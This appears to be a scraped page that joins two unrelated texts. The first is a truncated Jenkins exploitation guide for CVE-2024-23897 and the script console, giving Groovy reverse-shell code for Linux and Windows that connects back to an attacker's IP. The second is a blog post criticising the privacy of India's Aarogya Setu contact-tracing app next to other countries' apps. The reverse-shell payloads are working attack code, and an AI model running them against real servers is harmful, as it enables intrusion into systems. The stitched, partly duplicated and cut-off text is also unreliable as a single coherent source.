Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Contact Tracing apps alerts others (as well as the Government) that they may have been in contact with people carrying/infected with the Virus. Many Countries has released official apps for contact tracing. Lets see how it works and what are the security and privacy concerns with it. In this post, i specifically compares India's Arogya Setu contact tracing app with other Nation's contact tracing applications.
How it works?
The app can be download from the App/Play store. User has to manually install this.All these contact tracing app uses a set of permissions such as Bluetooth, storage, network access etc. However it primarily make use of Bluetooth Low Energy (BLE) protocol for contact tracing. It tries to measures how far you are from the other person( Usually 1.5 meters). The application checks and connect with other mobile phones installed with the application over Bluetooth. This data will be stored on the phones. This depends and differs on applications. for example UK's NHS stores the data for 28 days, the data will be stored and after that it will be deleted.
The app can be download from the App/Play store. User has to manually install this.All these contact tracing app uses a set of permissions such as Bluetooth, storage, network access etc. However it primarily make use of Bluetooth Low Energy (BLE) protocol for contact tracing. It tries to measures how far you are from the other person( Usually 1.5 meters). The application checks and connect with other mobile phones installed with the application over Bluetooth. This data will be stored on the phones. This depends and differs on applications. for example UK's NHS stores the data for 28 days, the data will be stored and after that it will be deleted.
If you came in proximity of the affected person with in 21 days (normally), you will get notified. This notification process can be automated and manually. For example, Singapore does this manually whereas in Australia it is automated. No personal details are involved in the notification. Means It will not alert with whom(name) you came in contact with. Personal details remains anonymous.It will just sent a notification urging them to isolate or to contact the health officials.
What information usually the app collects?
While installing the application, it collects some details and verify the user as well. The details differs from apps to apps. Some common details collected are,
1) Mobile number
2) Full Name
3) Gender
4) Age
5) Postcode
6) GPS location access permission. (*controversial and exceptions, explained below)
Some Specifics
Most countries has considered the following specifics on contact tracing application.
- Conduct Privacy Assessments related to the application and data collection.
- Made the Source code is public, so that any vulnerabilities in that can be found and fixed ASAP, thereby making the app more secure.
- Importance and need fort he application has communicated to their citizens.
- Clarify data collection.
- Seek active consent from the user on the application and data collection/usage.
- Finally OPT-IN, Not MANDATORY.
Now lets analyze Arogya Setu.
- In India, at many places and organizations/departments, the installation of Arogya Setu app has been made as compulsory. NOIDA city even went extreme with up to six months jail term if you don't install this Arogya Setu contact tracing application. Mostly all countries made their contact tracing as an opt-in option where as in India, the authorities are forcing the people to install it.
- Now regarding to the use of GPS location services. This is the most controversial things with Arogya Setu Application. Mostly all other counties relies on the Bluetooth information and don't use or collect the GPS Location details. Because accessing the location services invades and might compromise a person's privacy. While installing Arogya Setu, you cant register or proceed further without giving access to the GPS Location services, and that also set as "Always". Means the location can be tracked via GPS continuously and it is indeed a surveillance. The retired Supreme Court judge, who heads the expert panel on data protection laws, said pushing the App would cause “more concern to citizens than benefit”. Accessing location data and any compromise to that can lead to huge privacy crisis. Already a french hacker was able to illustrate and explain how these location details can be misused.
- Make the code open source and develop the application based on open-source architecture. However the Government mulls open-source architecture for app.
In my personal opinion, if the intention is to control the COVID-19 spread and help people, then the Government can do things differently and much better. Take considering the privacy of citizens as a primary factor, use open-source architecture and thereby secure the application and use the funda of least privilege/need to know. Collect only what you need to achieve the objective. Other countries such as Singapore, Australia has done tremendous success with their contact tracing applications by considering their citizen's privacy.